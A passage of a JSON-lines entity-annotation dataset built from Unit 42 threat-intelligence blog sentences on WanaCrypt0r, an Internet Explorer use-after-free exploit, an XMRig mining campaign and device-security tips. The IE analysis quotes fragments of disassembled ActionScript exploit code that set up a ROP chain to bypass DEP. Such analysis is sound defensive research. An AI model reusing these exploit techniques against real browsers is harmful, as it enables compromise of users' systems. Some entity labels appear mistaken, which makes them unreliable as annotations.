different domains.","entities":[{"id":48040,"label":"URL","start_offset":40,"end_offset":94},{"id":8633,"label":"malware","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} {"id":2829,"text":"If it was successful in connecting to the domain, the ransomware would not execute.","entities":[],"relations":[],"Comments":[]} {"id":2830,"text":"However, it was easily subverted to work against the malware.","entities":[],"relations":[],"Comments":[]} {"id":2831,"text":"A security researcher in the United Kingdom initially registered this domain in order to track this threat, and soon discovered that in doing so, he had enabled this “killswitch”, causing a number of instances of WanaCrypt0r to not execute for a large number of infected systems.","entities":[{"id":48041,"label":"location","start_offset":29,"end_offset":43},{"id":48042,"label":"malware","start_offset":213,"end_offset":224}],"relations":[],"Comments":[]} {"id":2832,"text":" On Friday, May 12, 2017, Microsoft announced that they were making an emergency patch available for out-of-support versions of Windows (Windows XP, Windows 8 and Windows Server 2003). ","entities":[{"id":45717,"label":"SOFTWARE","start_offset":128,"end_offset":135},{"id":45714,"label":"TIME","start_offset":4,"end_offset":24},{"id":45716,"label":"identity","start_offset":26,"end_offset":35},{"id":45718,"label":"SOFTWARE","start_offset":137,"end_offset":147},{"id":45719,"label":"SOFTWARE","start_offset":149,"end_offset":158},{"id":45720,"label":"SOFTWARE","start_offset":163,"end_offset":182}],"relations":[],"Comments":[]} {"id":2833,"text":"As of this writing attacks appear to have subsided.","entities":[],"relations":[],"Comments":[]} {"id":2834,"text":"This is likely due to increased uptake of the patch MS17-010 in light of the WanaCrypt0r attacks, as well as efforts made within the security community.","entities":[{"id":48043,"label":"malware","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} {"id":2835,"text":" Unit 42 research shows there is likely very little actual payment of ransom.","entities":[{"id":48044,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":2836,"text":"We analyzed our known WanaCrypt0r samples and extract the following Bitcoin (BTC) addresses likely associated with the attackers and associated totals: This results in a total of 36 BTC, or roughly $63k based on the current price of BTC.","entities":[{"id":48045,"label":"identity","start_offset":22,"end_offset":33},{"id":48046,"label":"SOFTWARE","start_offset":68,"end_offset":81}],"relations":[],"Comments":[]} {"id":2837,"text":"Given that WanaCrypt0r requests $300 per infected machine, we can infer that approximately 210 victims have made payments to the attackers.","entities":[{"id":48047,"label":"malware","start_offset":11,"end_offset":22}],"relations":[],"Comments":[]} {"id":2838,"text":" Reconnaissance This attack does not appear to be targeted.","entities":[],"relations":[],"Comments":[]} {"id":2839,"text":"Therefore, there appears to be little recon as part of this attack.","entities":[],"relations":[],"Comments":[]} {"id":2840,"text":"There are some reports that there may be scanning of TCP port 445, which is one of the ports associated with SMB.","entities":[],"relations":[],"Comments":[]} {"id":2841,"text":"But these reports haven’t been conclusively verified.","entities":[],"relations":[],"Comments":[]} {"id":2842,"text":" There is no consensus in the industry on what the delivery method\/initial infection vector is.","entities":[],"relations":[],"Comments":[]} {"id":2843,"text":"There have been several theories: Unit 42 believes the most likely delivery method is method #2.","entities":[{"id":48048,"label":"identity","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} {"id":2844,"text":"However, this is not conclusively provenLateral Movement","entities":[{"id":45722,"label":"attack-pattern","start_offset":40,"end_offset":56}],"relations":[],"Comments":[]} {"id":2845,"text":" The WanaCrypt0r ransomware spreads itself by heavily scanning over TCP port 445 (associated with SMB) and attempting to exploit the ETERNALBLUE vulnerability on systems.","entities":[{"id":48049,"label":"malware","start_offset":5,"end_offset":16},{"id":8683,"label":"vulnerability","start_offset":133,"end_offset":144}],"relations":[{"id":381,"from_id":48049,"to_id":8683,"type":"exploits"}],"Comments":[]} {"id":2846,"text":"A successful attack against this vulnerability will infect the target system with the WanaCrypt0r ransomware, which will encrypt data on the target system and attempt to spread itself once again.","entities":[{"id":48050,"label":"malware","start_offset":86,"end_offset":97}],"relations":[],"Comments":[]} {"id":2847,"text":"Multiple vendors report that the malware includes the ability to spread via port 445 scans and attacks against the ETERNALBLUE vulnerability not only on internal networks but also across the Internet.","entities":[{"id":45723,"label":"vulnerability","start_offset":115,"end_offset":126}],"relations":[],"Comments":[]} {"id":2848,"text":"These reports indicate that in addition to the internal lateral movement already outlined, the WanaCrypt0r ransomware will scan for port 445 on random external IP addresses and if it finds an IP address with an open port 445, it will then scan all devices on the same \/24 IP range (i.e. that share the first three octets as that IP address with the open port 445). In general, WanaCrypt0r does not have C2 capabilities but it does utilize the TOR network to communicate encryption keys for decryption upon payment of ransom.","entities":[{"id":48051,"label":"malware","start_offset":95,"end_offset":106},{"id":48053,"label":"tools","start_offset":444,"end_offset":447},{"id":48052,"label":"malware","start_offset":378,"end_offset":389}],"relations":[],"Comments":[]} {"id":2849,"text":"It has been reported that the DOUBLEPULSAR backdoor (also from the Equation Group leak by Shadow Brokers) is installed and used to execute the malware after successful exploitation of a host via ETERNALBLUE, but this warrants further analysis.","entities":[{"id":48054,"label":"threat-actor","start_offset":67,"end_offset":81},{"id":8706,"label":"threat-actor","start_offset":90,"end_offset":104},{"id":8709,"label":"vulnerability","start_offset":195,"end_offset":206},{"id":8704,"label":"vulnerability","start_offset":30,"end_offset":42}],"relations":[{"id":383,"from_id":48054,"to_id":8709,"type":"exploits"},{"id":382,"from_id":48054,"to_id":8704,"type":"exploits"}],"Comments":[]} {"id":2850,"text":" Overall, WanaCrypt0r has been a notable incident within the security community, as the threat couples a wormable vulnerability\/exploit with a ransomware family.","entities":[{"id":45724,"label":"malware","start_offset":10,"end_offset":21}],"relations":[],"Comments":[]} {"id":2851,"text":"Users are urged to apply the necessary Microsoft patch to protect themselves against this threat.","entities":[{"id":48055,"label":"identity","start_offset":39,"end_offset":48}],"relations":[],"Comments":[]} {"id":2852,"text":" For protections, customers are advised to view this blog post that outlines the various ways the Palo Alto Networks platform prevents this threat. Cyber Threat Alliance member ElevenPaths has developed a tool which can be used to attempt to recover some files deleted by WanaCrypt0r.","entities":[{"id":48059,"label":"identity","start_offset":178,"end_offset":189},{"id":48058,"label":"identity","start_offset":149,"end_offset":170},{"id":48057,"label":"identity","start_offset":98,"end_offset":116},{"id":48056,"label":"malware","start_offset":273,"end_offset":284}],"relations":[],"Comments":[]} {"id":2853,"text":"You can find more information on this tool here.","entities":[],"relations":[],"Comments":[]} {"id":2854,"text":"Register for Ignite ’17 Security Conference Vancouver, BC June 12–15, 2017 ","entities":[{"id":48060,"label":"location","start_offset":45,"end_offset":58},{"id":48061,"label":"TIME","start_offset":59,"end_offset":75}],"relations":[],"Comments":[]} {"id":2855,"text":"Ignite ’17 Security Conference is a live, four-day conference designed for today’s security professionals.","entities":[],"relations":[],"Comments":[]} {"id":2856,"text":"Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry.","entities":[],"relations":[],"Comments":[]} {"id":2857,"text":"Visit the Ignite website for more information on tracks, workshops and marquee sessions.","entities":[],"relations":[],"Comments":[]} {"id":2858,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2859,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2860,"text":"The latest episode of the Don’t Panic cybersecurity podcast is now live.","entities":[],"relations":[],"Comments":[]} {"id":2861,"text":" In this latest episode, Ryan goes back to the topic he talked about in his 2018 predictions piece “The Era of Software Supply-Chain Attacks Has Begun”: Software Supply Chain attacks. ","entities":[{"id":48062,"label":"identity","start_offset":25,"end_offset":29},{"id":48063,"label":"TIME","start_offset":76,"end_offset":80}],"relations":[],"Comments":[]} {"id":2862,"text":"As a reminder, “Don’t Panic,” is the official podcast of Unit 42, the Palo Alto Network threat intelligence team and features Palo Alto Networks CSO Rick Howard and Palo Alto Networks Senior Vice President, Threat Intelligence Ryan Olson. You can find this episode and other Palo Alto Networks podcasts on iTunes, Google Play, or integrate the RSS feed into your favorite service.","entities":[{"id":45725,"label":"identity","start_offset":57,"end_offset":64},{"id":45729,"label":"identity","start_offset":165,"end_offset":183},{"id":45726,"label":"identity","start_offset":70,"end_offset":112},{"id":45727,"label":"identity","start_offset":126,"end_offset":148},{"id":45728,"label":"identity","start_offset":149,"end_offset":160},{"id":45731,"label":"identity","start_offset":227,"end_offset":237},{"id":45732,"label":"identity","start_offset":275,"end_offset":294},{"id":45733,"label":"SOFTWARE","start_offset":307,"end_offset":313},{"id":45734,"label":"SOFTWARE","start_offset":315,"end_offset":326},{"id":45735,"label":"SOFTWARE","start_offset":345,"end_offset":348}],"relations":[],"Comments":[]} {"id":2863,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2864,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2865,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2866,"text":"Late last month reports surfaced that a new Internet Explorer vulnerability (CVE-2014-1776) was being exploited in targeted attacks.","entities":[{"id":48064,"label":"SOFTWARE","start_offset":44,"end_offset":62},{"id":48065,"label":"vulnerability","start_offset":77,"end_offset":90}],"relations":[{"id":384,"from_id":48064,"to_id":48065,"type":"has"}],"Comments":[]} {"id":2867,"text":"The vulnerability allows an attacker to take full control over the system after a user views a web page in their browser.","entities":[],"relations":[],"Comments":[]} {"id":2868,"text":"According to Microsoft, it affects versions of Internet Explorer from version 6 to 11, meaning that almost all IE users are vulnerable to this bug.","entities":[{"id":48066,"label":"SOFTWARE","start_offset":47,"end_offset":64},{"id":45736,"label":"identity","start_offset":13,"end_offset":22},{"id":45738,"label":"SOFTWARE","start_offset":111,"end_offset":113}],"relations":[],"Comments":[]} {"id":2869,"text":"This vulnerability is so widespread that Microsoft has released patches to protect Windows XP, for which Microsoft has ended support since April 8, 2014.","entities":[{"id":48068,"label":"SOFTWARE","start_offset":83,"end_offset":93},{"id":48070,"label":"TIME","start_offset":139,"end_offset":152},{"id":48067,"label":"identity","start_offset":41,"end_offset":50},{"id":48069,"label":"identity","start_offset":105,"end_offset":114}],"relations":[],"Comments":[]} {"id":2870,"text":" Researchers from Palo Alto Networks have investigated this exploit in depth and concluded that this is a Use-After-Free vulnerability that occurs when Internet Explorer tries to reuse a freed CMarkup object.","entities":[{"id":48072,"label":"SOFTWARE","start_offset":152,"end_offset":169},{"id":48071,"label":"identity","start_offset":18,"end_offset":36}],"relations":[],"Comments":[]} {"id":2871,"text":"Attackers can manipulate memory allocations by using JavaScript to allocate an object that is freed before all references to that object are removed.","entities":[],"relations":[],"Comments":[]} {"id":2872,"text":"Once the object is free the Flash file will overwrite a length field in the vector object and allow arbitrary memory access.","entities":[{"id":48073,"label":"SOFTWARE","start_offset":28,"end_offset":33}],"relations":[],"Comments":[]} {"id":2873,"text":"After that the exploit uses a ROP chain to overwrite the virtual function table of a sound object to gain full control.","entities":[],"relations":[],"Comments":[]} {"id":2874,"text":"The exploit utilized several advanced exploit techniques to make it almost 100% reliable.","entities":[],"relations":[],"Comments":[]} {"id":2875,"text":"The exploit used in the wild contains two major parts, one is HTML which sets up the page to exploit, and the other is a Flash file which builds the memory layout in IE process and triggers the bug.","entities":[{"id":48074,"label":"SOFTWARE","start_offset":166,"end_offset":168},{"id":48075,"label":"SOFTWARE","start_offset":121,"end_offset":126}],"relations":[],"Comments":[]} {"id":2876,"text":"Two parts must be combined to ensure a successful attack.","entities":[],"relations":[],"Comments":[]} {"id":2877,"text":"The attack separated critical code into different pieces so that researchers could not reproduce the original exploit until they have both files.","entities":[],"relations":[],"Comments":[]} {"id":2878,"text":" The techniques used in this exploit are similar to those used in other recent attacks.","entities":[],"relations":[],"Comments":[]} {"id":2879,"text":"Last year, exploitation of CVE-2013-3163 targeted Internet Explorer 8 and earlier this year, we found exploitation of CVE-2014-0322 in Internet Explorer 10.","entities":[{"id":48076,"label":"vulnerability","start_offset":27,"end_offset":40},{"id":48077,"label":"SOFTWARE","start_offset":50,"end_offset":69},{"id":48079,"label":"SOFTWARE","start_offset":135,"end_offset":155},{"id":48078,"label":"vulnerability","start_offset":118,"end_offset":131}],"relations":[{"id":385,"from_id":48077,"to_id":48076,"type":"has"},{"id":386,"from_id":48079,"to_id":48078,"type":"has"}],"Comments":[]} {"id":2880,"text":"Similarities in each of these exploits indicate that they may have been created by the same author.","entities":[],"relations":[],"Comments":[]} {"id":2881,"text":"All three exploits share the same exploit techniques: All the Flash files used across the exploits have similar structures and even the same variable names.","entities":[{"id":48080,"label":"SOFTWARE","start_offset":63,"end_offset":68}],"relations":[],"Comments":[]} {"id":2882,"text":"For example, they all use the Timer object to check if a Vector object is modified.","entities":[],"relations":[],"Comments":[]} {"id":2883,"text":"The Timers are all set to repeat every one second for 4,096 seconds.","entities":[{"id":8814,"label":"TIME","start_offset":33,"end_offset":49},{"id":8815,"label":"TIME","start_offset":54,"end_offset":67}],"relations":[],"Comments":[]} {"id":2884,"text":"The Vector object is named ‘s’ and the Sound object is named “ss” in the Flash files used in all three exploits.","entities":[{"id":48081,"label":"SOFTWARE","start_offset":73,"end_offset":78}],"relations":[],"Comments":[]} {"id":2885,"text":"The following code is snippet from the disassembled ActionScript code of CVE-2014-1776.","entities":[{"id":48082,"label":"vulnerability","start_offset":73,"end_offset":86}],"relations":[],"Comments":[]} {"id":2886,"text":" Neither of these variables is actually used in this exploit.","entities":[],"relations":[],"Comments":[]} {"id":2887,"text":"If we go back and examine the exploit code for CVE-2013-3163, we see that the string ‘org’ was originally used as the trigger, and the variable ‘found’ was originally used as a flag indicating if the Vector object was modified.","entities":[{"id":48083,"label":"vulnerability","start_offset":47,"end_offset":60}],"relations":[],"Comments":[]} {"id":2888,"text":"It appears that the attacker reused the code from the earlier exploit and forgot to remove the unnecessary variables.","entities":[],"relations":[],"Comments":[]} {"id":2889,"text":"s[_local28][(((_local41 - _local12) \/ 4) + 9)] = _local9; s[_local28][(((_local41 - _local12) \/ 4) + 10)]","entities":[],"relations":[],"Comments":[]} {"id":2890,"text":"= 13078672;","entities":[],"relations":[],"Comments":[]} {"id":2891,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 11)]","entities":[],"relations":[],"Comments":[]} {"id":2892,"text":"= _","entities":[],"relations":[],"Comments":[]} {"id":2893,"text":"local7","entities":[],"relations":[],"Comments":[]} {"id":2894,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 12)]","entities":[],"relations":[],"Comments":[]} {"id":2895,"text":"= 3096481936;","entities":[],"relations":[],"Comments":[]} {"id":2896,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 13)]","entities":[],"relations":[],"Comments":[]} {"id":2897,"text":"= (this.m_longArrBase - 8);","entities":[],"relations":[],"Comments":[]} {"id":2898,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 14)]","entities":[],"relations":[],"Comments":[]} {"id":2899,"text":"= 13078672;","entities":[],"relations":[],"Comments":[]} {"id":2900,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 15)]","entities":[],"relations":[],"Comments":[]} {"id":2901,"text":"= this.m_rawLen;","entities":[],"relations":[],"Comments":[]} {"id":2902,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 16)]","entities":[],"relations":[],"Comments":[]} {"id":2903,"text":"= 3968066955;","entities":[],"relations":[],"Comments":[]} {"id":2904,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 17)]","entities":[],"relations":[],"Comments":[]} {"id":2905,"text":"= 753635372;","entities":[],"relations":[],"Comments":[]} {"id":2906,"text":" The exploit uses the code above to restore the corrupted object and save the stack frame on the heap so that the process would not crash after the exploit is successful.","entities":[],"relations":[],"Comments":[]} {"id":2907,"text":"All three exploits use the same method and similar addresses to achieve that goal, even including the same hard coded assembly and registers.","entities":[],"relations":[],"Comments":[]} {"id":2908,"text":"_local10 = this.m_ZwProtectAddr; _local41 = _local6; s[_local28][((((_local6 - _local12) \/ 4) - 2) - 4)] = (_local41 & 0xFFFFF000); s[_local28][((((_local6 - _local12) \/ 4) - 1) - 4)] = 0x3000; s[_local28][((_local6 - _local12) \/ 4)] = _local10; s[_local28][(((_local6 - _local12) \/ 4) + 1)] = (_local41 + 28); The code above shows the Flash code setting up the ROP chain to bypass DEP and includes another interesting marker.","entities":[{"id":48084,"label":"SOFTWARE","start_offset":342,"end_offset":347}],"relations":[],"Comments":[]} {"id":2909,"text":"Normally programmers begin counting at 0 when referencing arrays, but in all three exploits they began at -2, which is quite unusual.","entities":[],"relations":[],"Comments":[]} {"id":2910,"text":"Additionally, each sample uses a Sound object named ‘snd’ to gain control, and they all invoke the function toString(). ","entities":[],"relations":[],"Comments":[]} {"id":2911,"text":"The many similarities between these exploits lead us to believe they were written by the same actor or group.","entities":[],"relations":[],"Comments":[]} {"id":2912,"text":"Or at the very least, a common template has been used to craft exploits for the three Internet Explorer vulnerabilities we analyzed.","entities":[{"id":48085,"label":"SOFTWARE","start_offset":86,"end_offset":103}],"relations":[],"Comments":[]} {"id":2913,"text":"This re-use of techniques is common among exploits, even if they were not developed by the same group, and Palo Alto Networks employs a unique payload-based signature detection methodology, which is able to look at the behaviors of an exploit to prevent similar attacks in the future.","entities":[{"id":45740,"label":"identity","start_offset":107,"end_offset":125}],"relations":[],"Comments":[]} {"id":2914,"text":" Palo Alto Networks customers with a Threat Prevention subscription were automatically protected from exploitation of these vulnerabilities: We suggest customers ensure they are running the latest content version on their devices and apply the patches Microsoft released on May 1, 2014. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":48086,"label":"identity","start_offset":1,"end_offset":19},{"id":48087,"label":"identity","start_offset":253,"end_offset":262},{"id":48088,"label":"TIME","start_offset":275,"end_offset":286}],"relations":[],"Comments":[]} {"id":2915,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2916,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2917,"text":"In October 2017, Palo Alto Networks Unit 42 published research showing how attackers were adapting attack techniques to generate cryptocurrency for themselves.","entities":[{"id":48089,"label":"TIME","start_offset":3,"end_offset":15},{"id":48090,"label":"identity","start_offset":17,"end_offset":43}],"relations":[],"Comments":[]} {"id":2918,"text":"In that research, we also showed how these attacks were very broad and grew very quickly.","entities":[],"relations":[],"Comments":[]} {"id":2919,"text":" At the time, we said that the sudden, surging value of cryptocurrencies was likely behind the sudden, strong rise of these new attacks.","entities":[],"relations":[],"Comments":[]} {"id":2920,"text":"We said that if cryptocurrency values continue to remain high, we could expect to see attackers continue to focus on finding ways to carry out attacks to gain cryptocurrency, and that those attacks would continue to adapt proven attack techniques.","entities":[],"relations":[],"Comments":[]} {"id":2921,"text":" Unit 42 has just released new research showing that attackers are indeed continuing to adapt existing techniques to generate cryptocurrency.","entities":[{"id":48091,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} {"id":2922,"text":" In our research posting “Large Scale Monero Cryptocurrency Mining Operation using XMRig” we detail a new malware campaign that is global in scale, very large in the likely number of victims and uses well established techniques to mine the Monero cryptocurrency.","entities":[{"id":48092,"label":"SOFTWARE","start_offset":38,"end_offset":44},{"id":48094,"label":"SOFTWARE","start_offset":240,"end_offset":246},{"id":48093,"label":"tools","start_offset":83,"end_offset":88}],"relations":[],"Comments":[]} {"id":2923,"text":" Monero is a cryptocurrency similar to bitcoin but notable for its increased emphasis on providing a higher level of privacy around its transactions.","entities":[{"id":48095,"label":"SOFTWARE","start_offset":1,"end_offset":7}],"relations":[],"Comments":[]} {"id":2924,"text":"Like bitcoin, Monero is generated through “mining” a computationally intensive process that provides cryptocurrency credit in exchange for computing resources provided in service to the cryptocurrency and its transaction infrastructure.","entities":[{"id":48096,"label":"SOFTWARE","start_offset":14,"end_offset":20}],"relations":[],"Comments":[]} {"id":2925,"text":" The operation that Unit 42 has recently uncovered works to deliver XMRig, software that is used to mine the Monero cryptocurrency, to victims’ systems without their knowledge or consent.","entities":[{"id":45744,"label":"identity","start_offset":20,"end_offset":27},{"id":45745,"label":"tools","start_offset":68,"end_offset":73},{"id":45746,"label":"SOFTWARE","start_offset":109,"end_offset":115}],"relations":[],"Comments":[]} {"id":2926,"text":"While XMRig isn’t itself specifically malware, it’s being delivered using malware-delivery techniques without the user’s knowledge and consent just like malware.","entities":[{"id":48097,"label":"tools","start_offset":6,"end_offset":11}],"relations":[],"Comments":[]} {"id":2927,"text":"The attackers are doing this by using URL shorteners to make XMRig look like other, legitimate, and expected programs.","entities":[{"id":48098,"label":"tools","start_offset":60,"end_offset":66}],"relations":[],"Comments":[]} {"id":2928,"text":"This is a method attackers have used for years to deliver malware and they are using it now to get coinmining software on to people’s systems illicitly.","entities":[],"relations":[],"Comments":[]} {"id":2929,"text":" The attackers’ use of URL shortners enables our Unit 42 researchers to get an idea of the size, scope, and scale of this operation.","entities":[{"id":48099,"label":"identity","start_offset":49,"end_offset":68}],"relations":[],"Comments":[]} {"id":2930,"text":"And these are all notable and sobering.","entities":[],"relations":[],"Comments":[]} {"id":2931,"text":" First, this is a young campaign.","entities":[],"relations":[],"Comments":[]} {"id":2932,"text":"Our research shows this operation to be only about four months old.","entities":[],"relations":[],"Comments":[]} {"id":2933,"text":" Second, this is a very large campaign.","entities":[],"relations":[],"Comments":[]} {"id":2934,"text":"Our researchers can show that about one-half of the samples we found have affected 15 million people worldwide.","entities":[],"relations":[],"Comments":[]} {"id":2935,"text":"While we can’t see how many people the other half of the samples affect, it’s a reasonable supposition that the other half of the total samples affect just as many people as the half we can see.","entities":[],"relations":[],"Comments":[]} {"id":2936,"text":"This would mean that this operation may affect about 30 million people worldwide.","entities":[],"relations":[],"Comments":[]} {"id":2937,"text":" In terms of who’s been affected by this operation, again, we can only see half of those who have been affected.","entities":[],"relations":[],"Comments":[]} {"id":2938,"text":"But what we do see shows that this is a truly global operation.","entities":[],"relations":[],"Comments":[]} {"id":2939,"text":"This operation affected countries around the globe, but it appears that southeast Asia, northern Africa, and countries in South America were hit the most as shown below. Malicious downloads by country The specific breakout of countries affected, and their download counts are as follows: Taking all those points together, this is operation is very large and clearly very effective.","entities":[{"id":48103,"label":"attack-pattern","start_offset":171,"end_offset":190},{"id":48100,"label":"location","start_offset":72,"end_offset":86},{"id":48101,"label":"location","start_offset":88,"end_offset":103},{"id":48102,"label":"location","start_offset":122,"end_offset":135}],"relations":[],"Comments":[]} {"id":2940,"text":"It shows how attackers are aggressively focusing their operations and campaigns on generating and acquiring cryptocurrency.","entities":[],"relations":[],"Comments":[]} {"id":2941,"text":" From a threat point of view, there are two things that are notable.","entities":[],"relations":[],"Comments":[]} {"id":2942,"text":" First is the fact that from an attack technique point of view, there is nothing new here.","entities":[],"relations":[],"Comments":[]} {"id":2943,"text":"The tactics and techniques are not new or sophisticated.","entities":[],"relations":[],"Comments":[]} {"id":2944,"text":" Second is the fact that this operation is clearly very successful based on its size, scope, and age.","entities":[],"relations":[],"Comments":[]} {"id":2945,"text":" Looking at this latest operation on the continuum of evolving cryptocurrency-focused threats, it’s clear that this is an early-stage threat given its lack of sophistication and reuse of established techniques and tactics.","entities":[],"relations":[],"Comments":[]} {"id":2946,"text":"But given how quickly and broadly successful it is, combined with the continued high value of cryptocurrencies, we can also conclude that attackers will continue to focus on cryptocurrency and likely will evolve their techniques and tactics quickly.","entities":[],"relations":[],"Comments":[]} {"id":2947,"text":"Cryptocurrency-focused threats is a key area that all defenders should focus their intelligence and prevention efforts around in 2018.","entities":[],"relations":[],"Comments":[]} {"id":2948,"text":" Meanwhile, see our full research blog for full details on how attackers are distributing and using XMRig to generate Monero. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":48104,"label":"tools","start_offset":100,"end_offset":105}],"relations":[],"Comments":[]} {"id":2949,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} {"id":2950,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} {"id":2951,"text":"Today, Microsoft patched 59 Internet Explorer vulnerabilities, 21 of them discovered by Palo Alto Networks researchers.","entities":[{"id":48106,"label":"identity","start_offset":88,"end_offset":106},{"id":48105,"label":"identity","start_offset":7,"end_offset":16}],"relations":[],"Comments":[]} {"id":2952,"text":"Palo Alto Networks is committed not only to detecting attacks, but preventing them as well.","entities":[{"id":48107,"label":"identity","start_offset":0,"end_offset":18}],"relations":[],"Comments":[]} {"id":2953,"text":" Our internal research team discovered each of these 21 vulnerabilities and reported them to Microsoft so they could begin building and testing patches.","entities":[{"id":48108,"label":"identity","start_offset":93,"end_offset":102}],"relations":[],"Comments":[]} {"id":2954,"text":"Microsoft has already credited our team with 14 previous IE vulnerabilities in 2014, bringing our total for the year up to 35.","entities":[{"id":48109,"label":"identity","start_offset":0,"end_offset":9},{"id":48110,"label":"SOFTWARE","start_offset":57,"end_offset":59},{"id":48111,"label":"TIME","start_offset":78,"end_offset":83}],"relations":[],"Comments":[]} {"id":2955,"text":"We want to acknowledge Palo Alto Networks researchers Bo Qu, Hui Gao, Royce Lu, Xin Ouyang and the entire IPS team for all of the hard work they’ve put into discovering and validating these vulnerabilities.","entities":[{"id":45750,"label":"identity","start_offset":61,"end_offset":68},{"id":45751,"label":"identity","start_offset":70,"end_offset":78},{"id":45752,"label":"identity","start_offset":80,"end_offset":90},{"id":45753,"label":"identity","start_offset":106,"end_offset":114},{"id":45749,"label":"identity","start_offset":54,"end_offset":59},{"id":45748,"label":"identity","start_offset":23,"end_offset":41}],"relations":[],"Comments":[]} {"id":2956,"text":" The table below provides a summary of the vulnerabilities and which versions of Internet Explorer they impact.","entities":[{"id":48112,"label":"SOFTWARE","start_offset":81,"end_offset":98}],"relations":[],"Comments":[]} {"id":2957,"text":" Internet Explorer is used in many of the networks Palo Alto Networks protects around the world and we’re doing our part to make it as secure as possible.","entities":[{"id":48114,"label":"SOFTWARE","start_offset":1,"end_offset":18},{"id":48113,"label":"identity","start_offset":51,"end_offset":69}],"relations":[],"Comments":[]} {"id":2958,"text":"Last week we released a series of IPS signatures to detect an advanced exploitation technique that takes advantage of ActiveX. In May, we linked a recent IE 0-day (CVE-2014-1776) to exploit code used against two other IE vulnerabilities exploited in the last 12 months.","entities":[{"id":45754,"label":"vulnerability","start_offset":164,"end_offset":177},{"id":45755,"label":"SOFTWARE","start_offset":154,"end_offset":156},{"id":45756,"label":"SOFTWARE","start_offset":218,"end_offset":220}],"relations":[],"Comments":[]} {"id":2959,"text":" Microsoft patched 129 IE vulnerabilities in all of 2013 and today’s release brings the 2014 total to 116.","entities":[{"id":48115,"label":"identity","start_offset":1,"end_offset":10},{"id":48116,"label":"SOFTWARE","start_offset":23,"end_offset":25},{"id":48117,"label":"TIME","start_offset":52,"end_offset":56},{"id":48118,"label":"TIME","start_offset":88,"end_offset":92}],"relations":[],"Comments":[]} {"id":2960,"text":"The faster the good guys track these down and get them patched, the harder we make the lives of the criminals looking to exploit them.","entities":[],"relations":[],"Comments":[]} {"id":2961,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} {"id":2962,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} {"id":2963,"text":"This time every year, people all over the world get new devices.","entities":[],"relations":[],"Comments":[]} {"id":2964,"text":"Regardless of what holiday(s) you may (or may not) celebrate, the end of the year is a time for people to give and receive some of the latest devices to come on to the market.","entities":[],"relations":[],"Comments":[]} {"id":2965,"text":" Nothing spoils a new gadget more than having some kind of security or privacy problem related to it.","entities":[],"relations":[],"Comments":[]} {"id":2966,"text":"After that, nothing spoils the fun and excitement of unboxing and playing with an exciting new device than trying to figure out what you need to do to use it with reasonable safety and privacy.","entities":[],"relations":[],"Comments":[]} {"id":2967,"text":" To that end, we’re providing some very basic, but critical steps that you, your family, your loved ones, and friends can take to ensure some basic security and privacy for new devices quickly and easily that can help you be safer and not spoil your unboxing fun. In the vein of the holiday spirit, we’re providing a list of twelve short, simple recommendations that can help you have a happy, safe, and private holiday season.","entities":[],"relations":[],"Comments":[]} {"id":2968,"text":" 1. Use a Password Manager:","entities":[],"relations":[],"Comments":[]} {"id":2969,"text":"Even though not all devices can use password managers directly, it’s still one of the best things you can set up.","entities":[],"relations":[],"Comments":[]} {"id":2970,"text":"PCs and Macs as well as smartphones and tablets increasingly support the use of password managers directly.","entities":[],"relations":[],"Comments":[]} {"id":2971,"text":"But even for devices that don’t, you can and should use a password manager to generate and store strong passwords for use on all devices in its vault.","entities":[],"relations":[],"Comments":[]} {"id":2972,"text":"Preferably, find a password manager that requires two-factor authentication. 2. Protect Your Home Routers and Wi-Fi:","entities":[],"relations":[],"Comments":[]} {"id":2973,"text":"In a home of computers, phones, tablets and IoT devices, nearly always the common point is the home router and Wi-Fi.","entities":[],"relations":[],"Comments":[]} {"id":2974,"text":"For most, it’s something they set up once and forget about.","entities":[],"relations":[],"Comments":[]} {"id":2975,"text":"But if you want to keep your home devices more secure, you need to make sure the underlying router and Wi-Fi are more secure.","entities":[],"relations":[],"Comments":[]} {"id":2976,"text":"Take time to ensure you have a good, complex, unguessable password.","entities":[],"relations":[],"Comments":[]} {"id":2977,"text":"This is where a password manager can help.","entities":[],"relations":[],"Comments":[]} {"id":2978,"text":"You may consider configuring it to not broadcast the SSID as well: that can make adding devices a little harder, but that means it’s even harder for people to try and join your home network. 3. Set up More Secure Accounts on Your PCs and Macs: PCs and Macs (both desktop and laptop) are still around and as important as ever in the home.","entities":[],"relations":[],"Comments":[]} {"id":2979,"text":"Take time to set up an account for everyone with their own username and password.","entities":[],"relations":[],"Comments":[]} {"id":2980,"text":"Also, all modern operating systems allow you to make accounts “regular user” accounts 